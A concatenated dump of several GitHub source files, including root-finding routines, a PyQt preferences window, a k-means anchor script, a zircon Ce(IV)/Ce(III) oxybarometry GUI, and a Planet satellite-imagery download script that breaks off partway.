tol=1e-12, n=0):\n \"\"\"\n RECURSIVE\n\n Parameters\n ==========\n f : callable, function to find roots of\n xn : x_n (start with x_1)\n xm : x_n-1 (start with x_0)\n tol : tolerance\n n : number of steps\n\n Returns\n =======\n xn : root\n n : steps until result\n\n \"\"\"\n return (xn, n) if abs(xn-xm) < tol or abs(f(xn)) < tol \\\n else sekant(f, xn - (xn - xm) / (f(xn) - f(xm)) * f(xn), xn, tol, n+1)\n\n\ndef regula_falsi(f, a, b, tol=1e-12, n=0):\n \"\"\"\n RECURSIVE, not opimized\n\n Parameters\n ==========\n f : callable, function to find roots of\n a, b: intervall in which to search\n tol : tolerance\n n : number of steps\n\n Returns\n =======\n a : left border of interval (approx. 
of root)\n n : number of steps\n\n \"\"\"\n if abs(a-b) < tol or abs(f(a)) < tol:\n return a, n\n c = (a*f(b) - b*f(a)) / (f(b) - f(a))\n if np.sign(f(a)) == np.sign(f(c)):\n return regula_falsi(f, c, b, tol, n+1)\n else:\n return regula_falsi(f, a, c, tol, n+1)\n\n\ndef newton(f, df, x, tol=1e-12, n=0):\n \"\"\"\n RECURSIVE\n\n Parameters\n ==========\n f : callable, function\n df : callable, derivative of f\n x : initial value\n tol : tolerance\n n : number of steps\n\n Returns\n =======\n x : root of f\n n : number of steps\n\n \"\"\"\n xn = x - f(x) / df(x)\n return (xn, n+1) if abs(x-xn) < tol or abs(f(xn)) < tol \\\n else newton(f, df, xn, tol, n+1)\n\n\n#########\n# TEST #\n#########\n\nx = np.linspace(0, 4)\nFUNCS = {\n r'$cos(x)$' : (np.cos, lambda x: -np.sin(x)),\n r'$-\\frac{x^2}{2}+3$' : (lambda x: -x**2/2+3, lambda x: -x),\n r'$-x^2 e^{-x}+0.3$' : (lambda x: -x**2*np.exp(-x)+.3, lambda x: \\\n (x**2-2*x)*np.exp(-x)),\n r'$sin(x)^3$' : (lambda x: np.sin(x)**3, lambda x: \\\n 3*np.sin(x)**2*np.cos(x)),\n}\n\nRESULTS = [\n lambda func: '\\tbisek: \\t\\t %f, %d' % bisek(func, 0.5, 3.5),\n lambda func: '\\tsekant: \\t %f, %d' % sekant(func, 0.5, 3.5),\n lambda func: '\\tregula falsi: \\t %f, %d' % regula_falsi(func, 0.5, 3.5),\n lambda func, df: '\\tnewton: \\t %f, %d' % newton(func, df, 1),\n]\n\ndef test():\n [plt.plot(x, f[0](x), label=n) for n, f in FUNCS.items()]\n plt.legend()\n\n print('roots, number of steps:')\n for name, funcs in FUNCS.items():\n func, df = funcs\n print(name)\n for res in RESULTS[:-1]:\n try:\n print(res(func))\n except RecursionError:\n print('\\nNO CONVERGENCE!\\n')\n try:\n print(RESULTS[-1](func, df))\n except RecursionError:\n print('\\nNO CONVERGENCE!\\n')\n print('\\n')\n\n\ntest()\n","repo_name":"jerluebke/comp_phys","sub_path":"1st_exercise/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"21721305353","text":"# Zapytaj użytkownika o tekst\n# Zapytaj użytkownika o szerokość\n# Wyświetl tekst który będzie mial same duze litery\n# Tekst powinien byc wycentrowany - zgodnie z wartoscia szerokosci\n\nnapis = input(\"Podaj napis: \")\nwidth = int(input(\"Podaj szerokosc: \"))\n\nprint(f\"!{napis.center(width)}!\")\n\n\n","repo_name":"katebartnik/pythonalx","sub_path":"Zadania/zadanie_2.py","file_name":"zadanie_2.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43069048513","text":"from PyQt5 import QtWidgets\n\nfrom lib.ui.prefs import Ui_Prefs\nimport functools\n\nclass PrefsWindow(QtWidgets.QWidget, Ui_Prefs):\n def __init__(self, parent=None,config=None,config_path=None):\n super(PrefsWindow, self).__init__(parent)\n self.setupUi(self)\n\n self.config = config\n self.config_path = config_path\n\n self.btnClose.clicked.connect(self.close_window)\n self.optBoolTooltips.clicked.connect(functools.partial(self.update_prefs, 'optBoolTooltips'))\n self.optBoolMinimized.clicked.connect(functools.partial(self.update_prefs, 'optBoolMinimized'))\n self.leStationsJSON.textEdited.connect(functools.partial(self.update_prefs, 'leStationJSON'))\n self.leFavsJSON.textEdited.connect(functools.partial(self.update_prefs, 'leFavsJSON'))\n\n def close_window(self):\n self.save_prefs()\n self.close()\n\n def load_prefs(self):\n self.optBoolMinimized.setChecked(self.config.getboolean('DEFAULT','optBoolMinimized'))\n 
self.optBoolTooltips.setChecked(self.config.getboolean('DEFAULT','optBoolTooltips'))\n self.leStationsJSON.setText(self.config['PATHS']['leStationJSON'])\n self.leFavsJSON.setText(self.config['PATHS']['leFavsJSON'])\n\n def update_prefs(self,field,data):\n print(f\"field = {field} data = {data}\")\n\n if field == 'optBoolTooltips':\n if data:\n self.config['DEFAULT']['optBoolTooltips'] = 'True'\n else:\n self.config['DEFAULT']['optBoolTooltips'] = 'False'\n\n if field == 'optBoolMinimized':\n if data:\n self.config['DEFAULT']['optBoolMinimized'] = 'True'\n else:\n self.config['DEFAULT']['optBoolMinimized'] = 'False'\n\n if field == 'leStationJSON':\n self.config['PATHS']['leStationJSON'] = data\n\n if field == 'leFavsJSON':\n self.config['PATHS']['leFavsJSON'] = data\n\n def save_prefs(self):\n with open(self.config_path, 'w') as configfile:\n self.config.write(configfile)\n","repo_name":"jampola/radioqt","sub_path":"prefs_window.py","file_name":"prefs_window.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72880890804","text":"import os\nimport pickle\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.cluster import KMeans\n\n\n\ndata_dict_address = \"imagenet_vid_train.pkl\"\nvalidation_dict_address = 'imagenet_vid_val.pkl'\n\ntrain_data_information = pickle.load(open(data_dict_address, \"rb\"))\nvalidation_data_information = pickle.load(open(validation_dict_address, \"rb\"))\n\nall_data_information = train_data_information + validation_data_information\n\nimage_size = 320\nmin_ignore_area = 12.\nmin_ignore_ratio = 1. / 5.\nmax_ignore_ratio = 5.0\nratio_per_area = [3, 5, 5]\nscales_per_featuremap = 3\nareas = []\nfor address, label, augment_type in all_data_information:\n for bbox in label:\n if bbox[2] == 0. 
or bbox[3] == 0.:\n print(address)\n print(bbox)\n ratio = (bbox[2] * image_size) / (bbox[3] * image_size)\n area = np.sqrt((bbox[2] * image_size) * (bbox[3] * image_size))\n if area < min_ignore_area or ratio < min_ignore_ratio or ratio > max_ignore_ratio:\n continue\n areas.append([area])\n\nareas_array = np.array(areas)\n\nkmeans = KMeans(n_clusters=len(ratio_per_area) * scales_per_featuremap, n_init=30, max_iter=2000, random_state=20).fit(areas_array)\nareas_list = list(np.sort(kmeans.cluster_centers_[:, 0]))\nprint(\"----------------------\")\nprint(areas_list)\nprint(areas_list[::scales_per_featuremap])\nprint(\"----------------------\")\n\nscales = []\nfor idx, area in enumerate(areas_list):\n if idx % scales_per_featuremap == 0:\n if scales_per_featuremap == 1:\n scales.append([1.])\n if scales_per_featuremap == 2:\n scales.append([1., round(areas_list[idx + 1] / areas_list[idx], 3)])\n if scales_per_featuremap == 3:\n scales.append([1., round(areas_list[idx + 1] / areas_list[idx], 3), round(areas_list[idx + 2] / areas_list[idx], 3)])\n \nprint(scales)\nprint(\"----------------------\")\n\narea_thresholds = []\nfor idx, area in enumerate(areas_list):\n if idx % scales_per_featuremap == 0 and idx > 0:\n area_thresholds.append((areas_list[idx - 1] + areas_list[idx]) / 2)\n \nprint(area_thresholds)\nprint(\"----------------------\")\n\nratios = []\nfor i in range(len(ratio_per_area)):\n ratios.append([])\n \nfor address, label, augment_type in all_data_information:\n for bbox in label:\n ratio = (bbox[2] * image_size) / (bbox[3] * image_size)\n area = np.sqrt((bbox[2] * image_size) * (bbox[3] * image_size))\n if area < min_ignore_area or ratio < min_ignore_ratio or ratio > max_ignore_ratio:\n continue\n \n for index, at in enumerate(area_thresholds):\n if area < at:\n ratios[index].append([((bbox[2] * image_size) / (bbox[3] * image_size))])\n if area > area_thresholds[-1]:\n ratios[-1].append([((bbox[2] * image_size) / (bbox[3] * image_size))])\n\n# print(np.shape(ratios))\naspect_ratios = []\nfor idx, ratio in enumerate(ratios):\n ratio = np.array(ratio)\n print(np.mean(ratio), np.max(ratio), np.min(ratio))\n print(ratio.shape)\n kmeans = KMeans(n_clusters=ratio_per_area[idx], n_init=30, max_iter=2000, random_state=20).fit(ratio)\n aspect_ratio = list(np.sort(kmeans.cluster_centers_[:, 0]))\n aspect_ratios.append(list(np.round(aspect_ratio, 3)))\n\nprint(\"----------------------\")\nprint(aspect_ratios)\nprint(\"----------------------\")\n\nprint(\"++++++++++++++++++++++++\")\nprint(list(np.round(areas_list[::scales_per_featuremap], 3)))\nprint(scales)\nprint(aspect_ratios)\n\n\n# cluster_centers_areas = np.array(kmeans.cluster_centers_[:, 0]) * np.array(kmeans.cluster_centers_[:, 1])\n\n# cluster_widths = kmeans.cluster_centers_[np.argsort(cluster_centers_areas), 0]\n# cluster_heights = kmeans.cluster_centers_[np.argsort(cluster_centers_areas), 1]\n\n# print(cluster_widths)\n# print(cluster_heights)\n \n# plt.scatter(cluster_widths, cluster_heights)\n# plt.savefig('kmeans.png')\n\n# plt.hist(all_widths)\n# plt.savefig('all_widths.png')\n\n# plt.hist(all_heights)\n# plt.savefig('all_heights.png')\n\n# print(object_names)\n \n","repo_name":"hajizadeh/MobileDenseNet","sub_path":"kmeans_ground_truth.py","file_name":"kmeans_ground_truth.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"40909871731","text":"# 글자의 수가 최대 11개 이므로, 사이에 끼워넣는 연산자의 수는 10개이다.\n# 연산자의 종류는 총 4가지 이므로, 최악 시간복잡도가 
4 ** 10으로 백만 정도이다.\n# 따라서 완전탐색으로 문제를 해결했다.\nimport sys\nimport math\n\n\ndef search(a, s, m, d, idx, total):\n global answer1, answer2\n # print(a, s, m, d, total)\n if idx == N:\n answer1 = max(answer1, total)\n answer2 = min(answer2, total)\n return\n if a > 0:\n search(a - 1, s, m, d, idx + 1, total + num_list[idx])\n if s > 0:\n search(a, s - 1, m, d, idx + 1, total - num_list[idx])\n if m > 0:\n search(a, s, m - 1, d, idx + 1, total * num_list[idx])\n if d > 0:\n if total < 0:\n temp = (abs(total) // num_list[idx]) * -1\n else:\n temp = total // num_list[idx]\n search(a, s, m, d - 1, idx + 1, temp)\n\n\nN = int(input())\nnum_list = list(map(int, sys.stdin.readline().split()))\nanswer1, answer2 = -1 * math.inf, math.inf\nadd, sub, mul, div = map(int, input().split())\nsearch(add, sub, mul, div, 1, num_list[0])\nprint(answer1)\nprint(answer2)\n","repo_name":"kangmj921/personal_training","sub_path":"백준문제/DFS와 BFS/14888_연산자 끼워넣기.py","file_name":"14888_연산자 끼워넣기.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31052315476","text":"from sklearn.preprocessing import LabelBinarizer, OneHotEncoder\nimport pickle\nfrom pathlib import Path\n\n\n_module_path = Path(__file__).parent.parent.parent.resolve()\n_model_path = _module_path / 'model'\n\n\nclass Encoder:\n def __init__(self, verbose: bool = True):\n self.label_encoder = LabelBinarizer()\n self.categorical_features_encoder = OneHotEncoder(sparse=False, handle_unknown='ignore')\n self._verbose = verbose\n\n def save(self, output_folder: Path = _model_path) -> None:\n label_out_file = output_folder / 'label_enc.pkl'\n feature_out_file = output_folder / 'cat_enc.pkl'\n\n if not output_folder.is_dir():\n output_folder.mkdir(parents=True)\n\n with open(label_out_file, 'wb') as label_file:\n pickle.dump(obj=self.label_encoder, file=label_file)\n\n with open(feature_out_file, 'wb') as feature_file:\n pickle.dump(obj=self.categorical_features_encoder, file=feature_file)\n\n if self._verbose:\n print(f\"Saved encoders in {label_out_file.resolve()} and {feature_out_file.resolve()}\")\n\n def load(self, input_folder: Path = _model_path) -> None:\n label_in_file = input_folder / 'label_enc.pkl'\n feature_in_file = input_folder / 'cat_enc.pkl'\n\n with open(label_in_file, 'rb') as label_file:\n label_enc = pickle.load(label_file)\n\n with open(feature_in_file, 'rb') as feature_file:\n feature_enc = pickle.load(file=feature_file)\n\n self.categorical_features_encoder = feature_enc\n self.label_encoder = label_enc\n\n if self._verbose:\n print(f\"Loaded encoders from {label_in_file.resolve()} and {feature_in_file.resolve()}\")\n","repo_name":"smedagli/ml_prod","sub_path":"starter/ml/encoders.py","file_name":"encoders.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35588874118","text":"from ImportDependence import *\nfrom CustomClass import *\n\nclass ZirconCe(QMainWindow):\n _df = pd.DataFrame()\n _changed = False\n\n\n\n xlabel = r'$(r_i/3+r_{Zr}/6)(r_i-r_{Zr})^2 $'\n ylabel = r'$\\log_e D_{Zircon/Base}$'\n\n reference = 'Ballard, J. R., Palin, M. J., and Campbell, I. H., 2002, Relative oxidation states of magmas inferred from Ce(IV)/Ce(III) in zircon: application to porphyry copper deposits of northern Chile: Contributions to Mineralogy and Petrology, v. 144, no. 3, p. 
347-364.'\n\n Elements3 = ['La', 'Ce', 'Pr', 'Nd', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu']\n Elements4 = ['Th', 'U', 'Hf', 'Zr', 'Ce4']\n\n\n UsedElements3 = []\n UsedElements4 = []\n\n Ri3 = [1.16, 1.143, 1.126, 1.109, 1.079, 1.066, 1.053, 1.04, 1.027, 1.015, 1.004, 0.994, 0.985, 0.977]\n Ro3 = [0.84 for i in Ri3]\n\n Ri4 = [1.05,1.00 ,0.83 ,0.840,0.97 ]\n Ro4 = [0.84 for i in Ri4]\n\n ZirconZr = 497555\n\n x3=[]\n x4=[]\n\n Zircon = []\n ZirconCe=[]\n Ce3test = []\n DCe3test = []\n Ce4test = []\n DCe4test = []\n Ce4_3_Ratio = []\n\n xCe3 = 0.0479981\n xCe4 = 0.00788412\n\n def __init__(self, parent=None, df=pd.DataFrame()):\n QMainWindow.__init__(self, parent)\n self.setWindowTitle('Oxygen Fugacity Estimation by Ce(IV)/Ce(III) in Zircon (Ballard et al. 2002)')\n\n\n for i in range(len(self.Ri3)):\n self.x3.append((self.Ri3[i] / 3 + self.Ro3[i] / 6) * (self.Ri3[i] - self.Ro3[i]) * (self.Ri3[i] - self.Ro3[i]))\n\n if self.Elements3[i]=='Ce':\n self.xCe3=((self.Ri3[i] / 3 + self.Ro3[i] / 6) * (self.Ri3[i] - self.Ro3[i]) * (self.Ri3[i] - self.Ro3[i]))\n\n for i in range(len(self.Ri4)):\n self.x4.append((self.Ri4[i] / 3 + self.Ro4[i] / 6) * (self.Ri4[i] - self.Ro4[i]) * (self.Ri4[i] - self.Ro4[i]))\n if self.Elements3[i] == 'Ce4':\n self.xCe4=((self.Ri4[i] / 3 + self.Ro4[i] / 6) * (self.Ri4[i] - self.Ro4[i]) * (self.Ri4[i] - self.Ro4[i]))\n\n self._df = pd.DataFrame()\n self.raw = pd.DataFrame()\n\n self._df = df\n self.raw = df\n\n if (len(df) > 0):\n self._changed = True\n # print('DataFrame recieved')\n\n self.create_main_frame()\n self.create_status_bar()\n\n def save_plot(self):\n file_choices = 'pdf Files (*.pdf);;SVG Files (*.svg);;PNG Files (*.png)'\n\n path = QFileDialog.getSaveFileName(self,\n 'Save file', '',\n file_choices)\n if path:\n self.canvas.print_figure(path, dpi=self.dpi)\n self.statusBar().showMessage('Saved to %s' % path, 2000)\n\n def create_main_frame(self):\n\n self.resize(1200, 800)\n self.main_frame = QWidget()\n self.dpi = 128\n self.fig, self.axes = plt.subplots(1, 2, figsize=(12.0, 12.0), dpi=self.dpi)\n self.fig.subplots_adjust(hspace=0.1, wspace=0.1, left=0.1, bottom=0.2, right=0.9, top=0.9)\n self.canvas = FigureCanvas(self.fig)\n self.canvas.setParent(self.main_frame)\n\n self.mpl_toolbar = NavigationToolbar(self.canvas, self.main_frame)\n\n # Other GUI controls\n self.save_img_button = QPushButton('&Save Figure')\n self.save_img_button.clicked.connect(self.saveImgFile)\n\n self.show_data_button = QPushButton('&Show Result')\n self.show_data_button.clicked.connect(self.showResult)\n\n self.save_data_button = QPushButton('&Save Result')\n self.save_data_button.clicked.connect(self.saveResult)\n\n #\n # Layout with box sizers\n #\n self.hbox = QHBoxLayout()\n\n for w in [self.save_img_button, self.show_data_button, self.save_data_button]:\n self.hbox.addWidget(w)\n self.hbox.setAlignment(w, Qt.AlignVCenter)\n\n self.vbox = QVBoxLayout()\n self.vbox.addWidget(self.mpl_toolbar)\n\n self.vbox.addWidget(self.canvas)\n\n self.vbox.addLayout(self.hbox)\n\n self.textbox = GrowingTextEdit(self)\n self.textbox.setText(self.reference)\n self.vbox.addWidget(self.textbox)\n\n self.main_frame.setLayout(self.vbox)\n self.setCentralWidget(self.main_frame)\n\n def create_status_bar(self):\n self.textbox = QLineEdit(self)\n self.textbox.setText('Reference:' + '\\n' + self.reference)\n self.statusBar().addWidget(self.textbox, 1)\n\n def add_actions(self, target, actions):\n for action in actions:\n if action is None:\n target.addSeparator()\n else:\n 
target.addAction(action)\n\n def saveImgFile(self):\n ImgFileOutput, ok2 = QFileDialog.getSaveFileName(self,\n '文件保存',\n 'C:/',\n 'pdf Files (*.pdf);;SVG Files (*.svg);;PNG Files (*.png)') # 设置文件扩展名过滤,注意用双分号间隔\n\n if (ImgFileOutput != ''):\n self.canvas.print_figure(ImgFileOutput, dpi=300)\n\n def saveResult(self):\n DataFileOutput, ok2 = QFileDialog.getSaveFileName(self,\n '文件保存',\n 'C:/',\n 'Excel Files (*.xlsx);;CSV Files (*.csv)') # 数据文件保存输出\n\n if (DataFileOutput != ''):\n\n if ('csv' in DataFileOutput):\n self.newdf.to_csv(DataFileOutput, sep=',', encoding='utf-8')\n\n elif ('xls' in DataFileOutput):\n self.newdf.to_excel(DataFileOutput, encoding='utf-8')\n\n def showResult(self):\n\n self.tablepop = TableViewer(df=self.newdf, title='Zircon Ce4_3 Ratio Result')\n self.tablepop.show()\n\n def create_action(self, text, slot=None, shortcut=None,\n icon=None, tip=None, checkable=False,\n signal='triggered()'):\n action = QAction(text, self)\n if icon is not None:\n action.setIcon(QIcon(':/%s.png' % icon))\n if shortcut is not None:\n action.setShortcut(shortcut)\n if tip is not None:\n action.setToolTip(tip)\n action.setStatusTip(tip)\n if slot is not None:\n action.triggered.connect(slot)\n if checkable:\n action.setCheckable(True)\n return action\n\n\n def MultiBallard(self):\n\n self.axes[0].clear()\n self.axes[1].clear()\n\n self.axes[0].spines['right'].set_color('none')\n self.axes[0].spines['top'].set_color('none')\n\n self.axes[1].spines['right'].set_color('none')\n self.axes[1].spines['top'].set_color('none')\n\n self.axes[0].set_xlabel(self.xlabel)\n self.axes[0].set_ylabel(self.ylabel)\n self.axes[1].set_xlabel(self.xlabel)\n self.axes[1].set_ylabel(self.ylabel)\n\n\n\n\n\n\n self.items = self.raw.columns.values.tolist()\n\n self.rows = self.raw.index.values.tolist()\n\n DataX3=[]\n DataX4=[]\n\n Ybase3=[]\n Ybase4=[]\n\n\n self.Base = 0\n\n for i in range(len(self.raw)):\n if (self.raw.at[i, 'DataType'] == 'Base'):\n self.Base = i\n self.BaseCe = self.raw.at[i, 'Ce']\n self.BaseZr = self.raw.at[i, 'Zr']\n\n elif (self.raw.at[i, 'DataType'] == 'Zircon'):\n self.Zircon.append(i)\n\n\n for i in self.items:\n if i in self.Elements3:\n self.UsedElements3.append(i)\n DataX3.append(self.x3[self.Elements3.index(i)])\n Ybase3.append(self.raw.at[self.Base,i])\n\n elif i in self.Elements4:\n self.UsedElements4.append(i)\n DataX4.append(self.x4[self.Elements4.index(i)])\n Ybase4.append(self.raw.at[self.Base,i])\n\n\n\n\n #np.log(yi / ybase)\n\n\n\n print(self.rows)\n\n self.FittedData=[]\n\n\n\n print('\\n DataX3 ',len(DataX3),'\\n DataX4',len(DataX4))\n\n\n for i in self.rows:\n tmpy3 = []\n tmpy4 = []\n fittmpy3 = []\n fittmpy4 = []\n fitDataX3 = []\n fitDataX4 = []\n if i != self.Base:\n self.ZirconCe.append(self.raw.at[i, 'Ce'])\n\n\n for j in self.UsedElements3:\n if len(tmpy3)', connectionstyle='arc3,rad=0'))\n for k in range(len(DataX4)):\n self.axes[1].annotate(self.UsedElements4[k], xy=(DataX4[k], tmpy4[k]), fontsize=6, xytext=(16, 16),\n textcoords='offset points',\n ha='right', va='bottom',\n bbox=dict(boxstyle='round,pad=0.2', fc='red', alpha=0.3),\n arrowprops=dict(arrowstyle='->', connectionstyle='arc3,rad=0'))\n\n tmpy3 = []\n tmpy4 = []\n fittmpy3 = []\n fittmpy4 = []\n fitDataX3 = []\n fitDataX4 = []\n self.canvas.draw()\n\n\n self.DataToWrite = [\n ['Zircon Sample Label', 'Zircon Ce4_3 Ratio', 'Melt Ce4_3 Ratio', 'DCe4', 'DCe3', 'DCe Zircon/Melt'], ]\n for i in range(len(self.ZirconCe)):\n TMP = self.raw.at[self.Zircon[i], 'Label']\n ZirconTmp = (self.BaseCe - 
self.ZirconCe[i] / self.DCe3test[i]) / (\n self.ZirconCe[i] / self.DCe4test[i] - self.BaseCe)\n MeltTmp = (self.ZirconCe[i] - self.Ce3test[i]) / self.Ce3test[i] * self.DCe3test[i] / self.DCe4test[\n i]\n self.Ce4_3_Ratio.append(ZirconTmp)\n\n if len(self.DataToWrite) < len(DataX3):\n self.DataToWrite.append([TMP, ZirconTmp, MeltTmp, self.DCe4test[i], self.DCe3test[i], self.ZirconCe[i] / self.BaseCe])\n self.newdf = pd.DataFrame(self.DataToWrite)\n\n\n\n\n\n","repo_name":"GeoPyTool/GeoPyTool","sub_path":"geopytool/ZirconCe.py","file_name":"ZirconCe.py","file_ext":"py","file_size_in_byte":12601,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"76"} +{"seq_id":"15208374327","text":"#!/usr/bin/env python\n# Filename: download_planet_img \n\"\"\"\nintroduction:\n\nauthors: Huang Lingcao\nemail:huanglingcao@gmail.com\nadd time: 05 October, 2019\n\"\"\"\n\nimport sys,os\nfrom optparse import OptionParser\n\nHOME = os.path.expanduser('~')\n\n# path of DeeplabforRS\ncodes_dir2 = HOME + '/codes/PycharmProjects/DeeplabforRS'\nsys.path.insert(0, codes_dir2)\n\nimport basic_src.io_function as io_function\nimport basic_src.basic as basic\nimport vector_gpd\nimport basic_src.map_projection as map_projection\n\n# import thest two to make sure load GEOS dll before using shapely\nimport shapely\nfrom shapely.geometry import mapping # transform to GeJSON format\nimport geopandas as gpd\nfrom shapely.geometry import shape\n\nfrom datetime import datetime\nimport json\nimport time\nimport random\n\nimport multiprocessing\nfrom multiprocessing import Pool\nfrom multiprocessing import Process\n\n\nfrom retrying import retry\n\nfrom planet import api\nfrom planet.api.exceptions import APIException\nfrom planet.api import filters\n# ClientV1 provides basic low-level access to Planet’s API. 
Only one ClientV1 should be in existence for an application.\nclient = None # api.ClientV1(api_key=\"abcdef0123456789\") #\n\n# more on the asset type are available at: https://developers.planet.com/docs/data/psscene4band/\n\nasset_types=['analytic_sr','analytic_xml','udm'] # # surface reflectance, metadata, mask file\n# if analytic_sr not available, we will download analytic (supplementary asset types)\nsupp_asset_types = ['analytic']\n\ndownloaded_scene_geometry = [] # the geometry (extent) of downloaded images\nmanually_excluded_scenes = [] # manually excluded item id\n\ndef p(data):\n print(json.dumps(data, indent=2))\n\ndef get_and_set_Planet_key(user_account):\n keyfile = HOME+'/.planetkey'\n with open(keyfile) as f_obj:\n lines = f_obj.readlines()\n for line in lines:\n if user_account in line:\n key_str = line.split(':')[1]\n key_str = key_str.strip() # remove '\\n'\n os.environ[\"PL_API_KEY\"] = key_str\n # set Planet API client\n global client\n client = api.ClientV1(api_key = key_str)\n\n return True\n raise ValueError('account: %s cannot find in %s'%(user_account,keyfile))\n\ndef search_scenes_on_server(idx, geom, start_date, end_date, cloud_cover_thr,item_types):\n # search and donwload using Planet Client API\n combined_filter = get_a_filter_cli_api(geom, start_date, end_date, cloud_cover_thr)\n\n # get the count number\n item_count = get_items_count(combined_filter, item_types)\n if item_count == 100000:\n basic.outputlogMessage('error, failed to get images of %dth polygon currently, skip it' % idx)\n return False\n basic.outputlogMessage('The total number of scenes is %d' % item_count)\n\n req = filters.build_search_request(combined_filter, item_types)\n # p(req)\n res = client.quick_search(req)\n\n return res, item_count\n\n\ndef get_items_count(combined_filter, item_types):\n '''\n based on the filter, and item types, the count of item\n :param combined_filter: filter\n :param item_types: item types\n :return: the count of items\n '''\n\n try:\n req = filters.build_search_request(combined_filter, item_types, interval=\"year\") #year or day\n stats = client.stats(req).get()\n except APIException as e:\n # basic.outputlogMessage(str(e))\n output_planetAPI_error(str(e))\n return 100000 # return a large number\n\n # p(stats)\n total_count = 0\n for bucket in stats['buckets']:\n total_count += bucket['count']\n return total_count\n\n# try max 1000 times, wait rand from 1 to 10 seconds\n@retry(stop_max_attempt_number=1000, wait_random_min=1000, wait_random_max=10000)\ndef get_assets_from_server(item):\n '''\n get assets from the servers\n :param item:\n :return:\n '''\n try :\n assets = client.get_assets(item).get()\n # except APIException as e:\n # raise ValueError(\"Manually output the error: \"+str(e))\n except:\n raise APIException\n return assets\n\n# try max 1000 times, wait rand from 1 to 10 seconds\n@retry(stop_max_attempt_number=1000, wait_random_min=1000, wait_random_max=10000)\ndef activate_a_asset_on_server(asset):\n '''\n activate a asset on the server (make it ready for download)\n :param asset:\n :return:\n '''\n try:\n res = client.activate(asset)\n except APIException as e:\n e_str = str(e)\n output_planetAPI_error(str(e))\n if \"Download quota has been exceeded\" in e_str:\n sys.exit(1) # only exit this sub-process, not\n # quit(1) # may exit the entire program (not working)\n except:\n raise APIException\n\n # print(activation.response.status_code)\n if int(res.response.status_code) == 401:\n basic.outputlogMessage('The account does not have permissions to 
download this file')\n return False\n\n if int(res.response.status_code) == 429:\n raise Exception(\"rate limit error\")\n return True\n\n# try max 1000 times, wait rand from 1 to 30 seconds\n@retry(stop_max_attempt_number=1000, wait_random_min=1000, wait_random_max=30000)\ndef download_a_asset_from_server(item,assets,asset_key,save_dir):\n '''\n download a asset from the server\n :param item: the item\n :param assets: assets from get_assets_from_server\n :param asset_key: the name of the asset\n :param save_dir: save dir\n :return: True if successful, Flase otherwise\n '''\n\n proc_id = multiprocessing.current_process().pid\n print('Process: %d, start downloading %s (id: %s)'%(proc_id,asset_key,item['id']))\n output_stream = sys.stdout\n def download_progress(start=None,wrote=None,total=None, finish=None): #result,skip=None\n # print(start,wrote,total,finish)\n # if total:\n # # print('received: %.2f K'%(float(total)/1024.0))\n # output_stream.write('received: %.2f K'%(float(total)/1024.0))\n # output_stream.flush()\n # if total:\n # if finish is None:\n # print('received: %.2f K'%(float(total)/1024.0), end='\\r')\n # else:\n # print('received: %.2f K' % (float(total) / 1024.0))\n pass\n callback = api.write_to_file(directory=save_dir + '/', callback=download_progress) # save_dir + '/' #\n body = client.download(assets[asset_key], callback=callback)\n # body.await() for version 1.1.0\n try:\n body.wait() # for version > 1.4.2\n except APIException as e:\n output_planetAPI_error('An APIException occurs when try to download %s (id: %s)'%(asset_key,item['id']))\n output_planetAPI_error(str(e))\n raise Exception(\"rate limit error or other API errors\")\n # return False # return a large number\n except:\n raise APIException\n\n return True\n\n\ndef read_polygons_json(polygon_shp, no_json=False):\n '''\n read polyogns and convert to json format\n :param polygon_shp: polygon in projection of EPSG:4326\n :param no_json: True indicate not json format\n :return:\n '''\n return vector_gpd.read_polygons_json(polygon_shp, no_json)\n\ndef output_planetAPI_error(message):\n logfile = 'planet_APIException.txt'\n timestr = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime() )\n outstr = timestr +': '+ message\n print(outstr)\n f=open(logfile,'a')\n f.writelines(outstr+'\\n')\n f.close()\n\n pass\n\ndef get_a_filter_cli_api(polygon_json,start_date, end_date, could_cover_thr):\n '''\n create a filter based on a geometry, date range, cloud cover\n :param polygon_json: a polygon in json format\n :param start_date: start date\n :param end_date: end date\n :param could_cover_thr: images with cloud cover less than this value\n :return: a combined filter (and filter)\n '''\n\n # gt: Greater Than\n # gte: Greater Than or Equal To\n # lt: Less Than\n # lte: Less Than or Equal To\n\n geo_filter = filters.geom_filter(polygon_json)\n date_filter = filters.date_range('acquired', gte=start_date, lte = end_date)\n cloud_filter = filters.range_filter('cloud_cover', lte=could_cover_thr)\n\n combined_filters = filters.and_filter(geo_filter, date_filter, cloud_filter)\n\n return combined_filters\n\n\ndef activate_and_download_asset(item,assets,asset_key,save_dir,process_num):\n '''\n active a asset of a item and download it\n :param item: the item\n :param assets: assets from get_assets_from_server\n :param asset_key: the name of the asset\n :param save_dir: save dir\n :return: True if successful, Flase otherwise\n '''\n\n proc_id = multiprocessing.current_process().pid\n asset = assets.get(asset_key)\n\n # activate\n out = 
